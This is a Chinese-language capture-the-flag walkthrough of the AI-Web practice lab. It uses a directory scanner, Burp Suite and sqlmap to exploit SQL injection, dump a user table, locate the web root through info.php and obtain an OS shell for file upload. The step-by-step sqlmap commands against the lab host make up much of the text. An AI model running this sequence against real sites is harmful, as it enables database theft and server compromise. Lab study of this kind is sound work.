一.查找robots.txt文件
用御剑扫描靶场ip,我们发现了robots.txt
我们在去网站访问一下robots.txt,然后再每个目录都访问一下
当我们访问到se3reTdir777的时候,会出现这个提交窗口
二.sql注入(工具)
所用工具:
(1)kali操作系统,或者在windows端部署python环境安装sqlmap工具
在kali操作系统中打开终端输入sqlmap,看有没有这个工具,如果没有安装一下,输入apt install sqlmap就会安装成功。
(2)burp suite抓包代理工具
1.查看网站是否有sql注入
用burp suite抓靶场网址http://192.168.95.136/se3reTdir777/的包
将红框中的内容复制,创建一个新的文件1.txt,将数据包放在文件中,上传到kali中
在文件的目录打开终端
输入sqlmap -r 1.txt这个是检查是否有sql注入的
我们看到下面这个就成功了,说明有sql注入
2.查询数据库名
输入sqlmap -r 1.txt --dbs
结果,库名为:aiweb1
3.查询表名
输入sqlmap -r 1.txt -D aiweb1 --tables
(-D:数据库,aiweb1:数据库名)
结果为user和systemUser,我们在查询user表
4.查询列名
输入sqlmap -r 1.txt -D aiweb1 -T user --columns --batch
(-D:数据库,aiweb1:数据库名)(-T:数据表,user:表名)
结果为下图,firstName,id,lastName
5.查询数据
将users表中数据dump下来(谨慎操作)
注:请勿用dump用于练习靶场之外
输入sqlmap -r 1.txt -D aiweb1 -T user --dump --batch
上面的图中红框引号就是他的路径,我们去查看一下,
6.找到绝对路径
用dirb工具
在kali终端输入dirb http://192.168.95.136/m3diNf0/
这样我们就跑出了一个info.php文档
去浏览器上打开就可以找到绝对路径
7.获取OS-shell功能
回到原目录输入slqmap -r 1.txt --os-shell
在输入4,回车
在输入2,回车
在下面输入绝对路径加上/se3reTdir777/uploads/
输入/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
回车
这个位置就是上传文件的网址路径,去复制访问
在这里我们就可以上传文件了
以上就是ai web靶场的通关攻略SQL